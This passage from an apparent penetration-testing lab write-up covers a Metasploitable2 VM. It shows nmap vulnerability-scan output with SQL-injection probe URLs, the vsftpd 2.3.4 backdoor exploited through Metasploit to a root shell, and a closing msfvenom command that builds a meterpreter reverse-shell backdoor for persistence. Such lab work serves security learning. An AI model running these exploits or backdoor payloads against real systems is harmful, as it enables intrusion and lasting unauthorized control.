    |     http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
    |     http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
    |     http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?do=toggle-hints%27%20OR%20sqlspider&page=pen-test-tool-lookup.php
    |     http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?do=toggle-security%27%20OR%20sqlspider&page=pen-test-tool-lookup.php
    |     http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
    |     http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
    |     http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
    |   Possible sqli for forms:
    |     Form at path: /mutillidae/index.php, form's action: index.php. Fields that might be vulnerable:
    |       choice
    |       choice
    |       choice
    |       choice
    |       choice
    |       choice
    |       choice
    |       choice
    |       choice
    |       choice
    |       choice
    |       choice
    |_      initials
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    |_http-trace: TRACE is enabled
    |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
    111/tcp  open  rpcbind
    139/tcp  open  netbios-ssn
    445/tcp  open  microsoft-ds
    512/tcp  open  exec
    513/tcp  open  login
    514/tcp  open  shell
    1099/tcp open  rmiregistry
    | rmi-vuln-classloader: 
    |   VULNERABLE:
    |   RMI registry default configuration remote code execution vulnerability
    |     State: VULNERABLE
    |       Default configuration of RMI registry allows loading classes from remote URLs which can lead to remote code execution.
    |       
    |     References:
    |_      https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/java_rmi_server.rb
    1524/tcp open  ingreslock
    2049/tcp open  nfs
    2121/tcp open  ccproxy-ftp
    3306/tcp open  mysql
    |_ssl-ccs-injection: No reply from server (TIMEOUT)
    |_sslv2-drown: 
    5432/tcp open  postgresql
    | ssl-ccs-injection: 
    |   VULNERABLE:
    |   SSL/TLS MITM vulnerability (CCS Injection)
    |     State: VULNERABLE
    |     Risk factor: High
    |       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
    |       does not properly restrict processing of ChangeCipherSpec messages,
    |       which allows man-in-the-middle attackers to trigger use of a zero
    |       length master key in certain OpenSSL-to-OpenSSL communications, and
    |       consequently hijack sessions or obtain sensitive information, via
    |       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
    |           
    |     References:
    |       http://www.openssl.org/news/secadv_20140605.txt
    |       http://www.cvedetails.com/cve/2014-0224
    |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
    | ssl-dh-params: 
    |   VULNERABLE:
    |   Diffie-Hellman Key Exchange Insufficient Group Strength
    |     State: VULNERABLE
    |       Transport Layer Security (TLS) services that use Diffie-Hellman groups
    |       of insufficient strength, especially those using one of a few commonly
    |       shared groups, may be susceptible to passive eavesdropping attacks.
    |     Check results:
    |       WEAK DH GROUP 1
    |             Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
    |             Modulus Type: Safe prime
    |             Modulus Source: Unknown/Custom-generated
    |             Modulus Length: 1024
    |             Generator Length: 8
    |             Public Key Length: 1024
    |     References:
    |_      https://weakdh.org
    | ssl-poodle: 
    |   VULNERABLE:
    |   SSL POODLE information leak
    |     State: VULNERABLE
    |     IDs:  BID:70574  CVE:CVE-2014-3566
    |           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
    |           products, uses nondeterministic CBC padding, which makes it easier
    |           for man-in-the-middle attackers to obtain cleartext data via a
    |           padding-oracle attack, aka the "POODLE" issue.
    |     Disclosure date: 2014-10-14
    |     Check results:
    |       TLS_RSA_WITH_AES_128_CBC_SHA
    |     References:
    |       https://www.securityfocus.com/bid/70574
    |       https://www.openssl.org/~bodo/ssl-poodle.pdf
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
    |_      https://www.imperialviolet.org/2014/10/14/poodle.html
    |_sslv2-drown: 
    5900/tcp open  vnc
    |_sslv2-drown: 
    6000/tcp open  X11
    6667/tcp open  irc
    |_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277
    8009/tcp open  ajp13
    8180/tcp open  unknown
    | http-cookie-flags: 
    |   /admin/: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/index.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/login.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/admin.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/account.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/admin_login.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/home.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/admin-login.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/adminLogin.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/controlpanel.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/cp.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/index.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/login.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/admin.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/home.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/controlpanel.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/admin-login.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/cp.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/account.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/admin_login.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/adminLogin.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/includes/FCKeditor/editor/filemanager/upload/test.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/jscript/upload.html: 
    |     JSESSIONID: 
    |_      httponly flag not set
    | http-enum: 
    |   /admin/: Possible admin folder
    |   /admin/index.html: Possible admin folder
    |   /admin/login.html: Possible admin folder
    |   /admin/admin.html: Possible admin folder
    |   /admin/account.html: Possible admin folder
    |   /admin/admin_login.html: Possible admin folder
    |   /admin/home.html: Possible admin folder
    |   /admin/admin-login.html: Possible admin folder
    |   /admin/adminLogin.html: Possible admin folder
    |   /admin/controlpanel.html: Possible admin folder
    |   /admin/cp.html: Possible admin folder
    |   /admin/index.jsp: Possible admin folder
    |   /admin/login.jsp: Possible admin folder
    |   /admin/admin.jsp: Possible admin folder
    |   /admin/home.jsp: Possible admin folder
    |   /admin/controlpanel.jsp: Possible admin folder
    |   /admin/admin-login.jsp: Possible admin folder
    |   /admin/cp.jsp: Possible admin folder
    |   /admin/account.jsp: Possible admin folder
    |   /admin/admin_login.jsp: Possible admin folder
    |   /admin/adminLogin.jsp: Possible admin folder
    |   /manager/html/upload: Apache Tomcat (401 Unauthorized)
    |   /manager/html: Apache Tomcat (401 Unauthorized)
    |   /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html: OpenCart/FCKeditor File upload
    |   /admin/includes/FCKeditor/editor/filemanager/upload/test.html: ASP Simple Blog / FCKeditor File Upload
    |   /admin/jscript/upload.html: Lizard Cart/Remote File upload
    |_  /webdav/: Potentially interesting folder
    | http-slowloris-check: 
    |   VULNERABLE:
    |   Slowloris DOS attack
    |     State: LIKELY VULNERABLE
    |     IDs:  CVE:CVE-2007-6750
    |       Slowloris tries to keep many connections to the target web server open and hold
    |       them open as long as possible.  It accomplishes this by opening connections to
    |       the target web server and sending a partial request. By doing so, it starves
    |       the http server's resources causing Denial Of Service.
    |       
    |     Disclosure date: 2009-09-17
    |     References:
    |       http://ha.ckers.org/slowloris/
    |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
    MAC Address: 08:00:27:67:67:30 (Oracle VirtualBox virtual NIC)
    
    Host script results:
    |_smb-vuln-ms10-054: false
    |_smb-vuln-ms10-061: false
    |_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
    
    Nmap done: 1 IP address (1 host up) scanned in 330.59 seconds
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    
    

    The above output shows the list of vulnerabilities and they are as follows:

    actually with the below output result and we will do vulnerability analysis via FTP (vsftpd service)



    PORT     STATE SERVICE
    21/tcp   open  ftp
    | ftp-vsftpd-backdoor: 
    |   VULNERABLE:
    |   vsFTPd version 2.3.4 backdoor
    |     State: VULNERABLE (Exploitable)
    |_sslv2-drown: 
    
    
    



    The attack Procedure


    we can see that the vulnerability was allegedly added to the vsftpd archive between the dates mentioned in the description of the module.

    The concept of the attack on VSFTPD 2.3.4 is to trigger the malicious execution, results in opening the backdoor on port 6200 of the system.



    Let's Exploiting


    The following result of the vulnerabole sourece code will make things much clearer:



    -    else if((p_str->p_buf[i]==0x3a)
    -    && (p_str->p_buf[i+1]==0x29))
    -    {
    -      vsf_sysutil_extra();
    -    }
       }
    



     

    We can clearly see that if the bytes in the network buffer match the backdoor sequence of 0x3a (colon) and 0x29, the malicious function is triggered. 

    Furthermore, is we explore the details of the malicious function, we can see the following function definition for the malicious function:




    Click Here For More Info - https://pastebin.com/AetT9sS5




    sa.sin_port=6200 serves as the backdoor port and all the commands sent to the service get executed using the execl("/bin/sh","sh",(char *)0); function.



    Vulnerability analysis of VSFTPD 2.3.4 backdoor


    After modeling threats, let us load the matching module into Metasploit using the use exploit/unix/ftp/vsftpd_234_backdoor command and analyze the vulnerability details using info command as follows:



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ sudo msfconsole -q                                                                                                       
    This copy of metasploit-framework is more than two weeks old.
     Consider running 'msfupdate' to update to the latest version.
    msf6 > search vsftpd
    
    Matching Modules
    ================
    
       #  Name                                  Disclosure Date  Rank       Check  Description
       -  ----                                  ---------------  ----       -----  -----------
       0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution
    
    
    Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
    
    msf6 > 
    msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
    [*] Using configured payload cmd/unix/interact
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > info 
    
           Name: VSFTPD v2.3.4 Backdoor Command Execution
         Module: exploit/unix/ftp/vsftpd_234_backdoor
       Platform: Unix
           Arch: cmd
     Privileged: Yes
        License: Metasploit Framework License (BSD)
           Rank: Excellent
      Disclosed: 2011-07-03
    
    Provided by:
      hdm 
      MC 
    
    Available targets:
      Id  Name
      --  ----
      0   Automatic
    
    Check supported:
      No
    
    Basic options:
      Name    Current Setting  Required  Description
      ----    ---------------  --------  -----------
      RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
      RPORT   21               yes       The target port (TCP)
    
    Payload information:
      Space: 2000
      Avoid: 0 characters
    
    Description:
      This module exploits a malicious backdoor that was added to the 
      VSFTPD download archive. This backdoor was introduced into the 
      vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 
      according to the most recent information available. This backdoor 
      was removed on July 3rd 2011.
    
    References:
      OSVDB (73573)
      http://pastebin.com/AetT9sS5
      http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
    
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
    




    Now we are going to add RHOST, RPORT, show payload, use payload and check about these options & finally we will exploit...

    We can see that the vulnerability was allegedly added to the vsftpd archive between the dates mentioned in the description of the module.



    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
    
    Module options (exploit/unix/ftp/vsftpd_234_backdoor):
    
       Name    Current Setting  Required  Description
       ----    ---------------  --------  -----------
       RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT   21               yes       The target port (TCP)
    
    
    Payload options (cmd/unix/interact):
    
       Name  Current Setting  Required  Description
       ----  ---------------  --------  -----------
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic
    
    
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 192.168.43.120
    RHOST => 192.168.43.120
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RPORT 21
    RPORT => 21
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads
    
    Compatible Payloads
    ===================
    
       #  Name                       Disclosure Date  Rank    Check  Description
       -  ----                       ---------------  ----    -----  -----------
       0  payload/cmd/unix/interact                   normal  No     Unix Command, Interact with Established Connection
    
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload payload/cmd/unix/interact
    payload => cmd/unix/interact
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
    



    And as you can after exploiting we can do many things but one thing is that one problem here and problem is how to maintain accessability with these exploitation because after exit from the exploitation then it will destroy the session and after that we have to exploit again to get access or run the command



    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > 
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
    
    [*] 192.168.43.120:21 - Banner: 220 (vsFTPd 2.3.4)
    [*] 192.168.43.120:21 - USER: 331 Please specify the password.
    [+] 192.168.43.120:21 - Backdoor service has been spawned, handling...
    [+] 192.168.43.120:21 - UID: uid=0(root) gid=0(root)
    [*] Found shell.
    [*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.43.120:6200) at 2021-07-10 00:21:53 +0530
    
    whoami
    root
    pwd
    /
    
    ls
    bin
    boot
    cdrom
    dev
    etc
    home
    initrd
    initrd.img
    lib
    lost+found
    media
    mnt
    nohup.out
    opt
    proc
    root
    sbin
    srv
    sys
    tmp
    usr
    var
    vmlinuz
    
    ls -la
    total 125
    drwxr-xr-x  21 root root  4096 May 20  2012 .
    drwxr-xr-x  21 root root  4096 May 20  2012 ..
    drwxr-xr-x   2 root root  4096 May 13  2012 bin
    drwxr-xr-x   4 root root  1024 May 13  2012 boot
    lrwxrwxrwx   1 root root    11 Apr 28  2010 cdrom -> media/cdrom
    drwxr-xr-x  14 root root 13500 Jul  9 13:48 dev
    drwxr-xr-x  94 root root  4096 Jul  9 14:41 etc
    drwxr-xr-x   7 root root  4096 Jun  2 05:32 home
    drwxr-xr-x   2 root root  4096 Mar 16  2010 initrd
    lrwxrwxrwx   1 root root    32 Apr 28  2010 initrd.img -> boot/initrd.img-2.6.24-16-server
    drwxr-xr-x  13 root root  4096 May 13  2012 lib
    drwx------   2 root root 16384 Mar 16  2010 lost+found
    drwxr-xr-x   4 root root  4096 Mar 16  2010 media
    drwxr-xr-x   3 root root  4096 Apr 28  2010 mnt
    -rw-------   1 root root 41871 Jul  9 13:49 nohup.out
    drwxr-xr-x   2 root root  4096 Mar 16  2010 opt
    dr-xr-xr-x 118 root root     0 Jul  9 13:48 proc
    drwxr-xr-x  13 root root  4096 Jul  9 13:49 root
    drwxr-xr-x   2 root root  4096 May 13  2012 sbin
    drwxr-xr-x   2 root root  4096 Mar 16  2010 srv
    drwxr-xr-x  12 root root     0 Jul  9 13:48 sys
    drwxrwxrwt   4 root root  4096 Jul  9 14:07 tmp
    drwxr-xr-x  12 root root  4096 Apr 28  2010 usr
    drwxr-xr-x  14 root root  4096 Mar 17  2010 var
    lrwxrwxrwx   1 root root    29 Apr 28  2010 vmlinuz -> boot/vmlinuz-2.6.24-16-server
    
    



    Post Exploitation

    After gaining knowledge about this vulnerability and gaining access, let us now exploit once again because we want to access of this vuln to maintain and undercover control in ownself. Let us now exploit the target system. Let us see what options we need to set before firing the exploit onto the target. we can do this by running the show options command, as shown following..




    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
    
    Module options (exploit/unix/ftp/vsftpd_234_backdoor):
    
       Name    Current Setting  Required  Description
       ----    ---------------  --------  -----------
       RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT   21               yes       The target port (TCP)
    
    
    Payload options (cmd/unix/interact):
    
       Name  Current Setting  Required  Description
       ----  ---------------  --------  -----------
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic
    
    
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 192.168.43.120
    RHOST => 192.168.43.120
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RPORT 21
    RPORT => 21
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads
    
    Compatible Payloads
    ===================
    
       #  Name                       Disclosure Date  Rank    Check  Description
       -  ----                       ---------------  ----    -----  -----------
       0  payload/cmd/unix/interact                   normal  No     Unix Command, Interact with Established Connection
    
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload payload/cmd/unix/interact
    payload => cmd/unix/interact
    
    




    We can see that we have only two options, which are RHOST and RPORT, we set RHOST as the IP address of the target and RPORT as 21, which is the port of the vulnerable FTP server.


    Next we can check for the matching payloads via the show payloads command to see what payloads are suitable for this particular exploit module.we can see only a single payload which is payload/cmd/unix/interact. We can use this payload using the set payload cmd/unix/interact command.




    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload payload/cmd/unix/interact
    payload => cmd/unix/interact
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > 
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
    
    [*] 192.168.43.120:21 - Banner: 220 (vsFTPd 2.3.4)
    [*] 192.168.43.120:21 - USER: 331 Please specify the password.
    [+] 192.168.43.120:21 - Backdoor service has been spawned, handling...
    [+] 192.168.43.120:21 - UID: uid=0(root) gid=0(root)
    [*] Found shell.
    [*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.43.120:6200) at 2021-07-10 00:21:53 +0530
    
    whoami
    root
    pwd
    /
    



    Vola!! we got it we goot root access to the target system. So, what's next? Since wehave got a simple shell, let us try gaining better control over the target by spawning a meterpreter shell.


    In order to maintain the access and meterpreter shell, we need to create a client-oriented payload, upload it to the target system, and execute it. so, lets get started....

     

    sudo msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.43.152 LPORT=4444 -f elf > backdoor.elf

